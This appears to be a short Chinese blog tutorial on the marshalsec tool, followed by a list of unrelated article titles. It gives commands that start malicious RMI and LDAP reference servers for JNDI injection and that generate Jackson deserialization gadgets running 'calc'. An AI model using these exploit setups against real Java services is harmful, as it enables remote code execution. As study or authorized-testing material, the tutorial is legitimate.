# marshalsec使用
2024-09-01 14:03:31
开启rmi服务,恶意类放到服务上
D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099
开启ldap服务
D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389
参考链接
列出所有jackson的gadgets传参为calc
D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a exploit.exec="calc"
所有支持的组件
所有支持的gadgets
如果想查找组件可以生成的gadgets有哪些
以Jackson为例
D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson
如果想查找gadgets可以用于哪些组件生成
1、以resin为例,可以查看手册
2、选择想看的gadgets->find usages
参考链接
最新文章
- Bootstrap<;基础九>;辅助类
- JQuery实现对勾事件代码
- 【leetcode】Implement strStr() (easy)
- 使用NSData处理数据
- 理解python先编译后解释的特点
- javascript之六种数据类型以及特殊注意点
- PHP.4-DIV+CSS标准网页布局准备工作(下)
- [BigData]关于Hadoop学习笔记第一天(PPT总结)(一)
- Hybrid App开发者一定不要错过的框架和工具
- rabbitmq pika connection closed
- USB通讯协议之深入理解
- ClassLoader的类结构分析
- HashTable源码阅读
- python 多线程 及多线程通信,互斥锁,线程池
- MVC中的下载文件及上传
- Python 音视频方面资源大全
- lsb_release command not found
- css3动态计算元素的高度及宽度
- LINUX 修改SSH默认22端口的方法
- wordpress获取文章所属分类
热门文章
- 32Flutter仿京东商城项目 用户中心页面布局
- Python基于正则表达式实现文件内容替换的方法
- 原创:Mac AppleScript 自动登录两个QQ
- Django中使用Bootstrap----带view.py视图函数(也就是项目下的脚本文件)
- Java解压tar.Z文件(使用Apache Commons-compress)
- python之bytes和string相互转换
- golang web框架 beego 学习 (七)json转数组
- Qt598x64vs2017.跨线程传递std::string
- Jenkins简单入门:下载-安装-配置-构建
- Python进入后台界面(admin)设定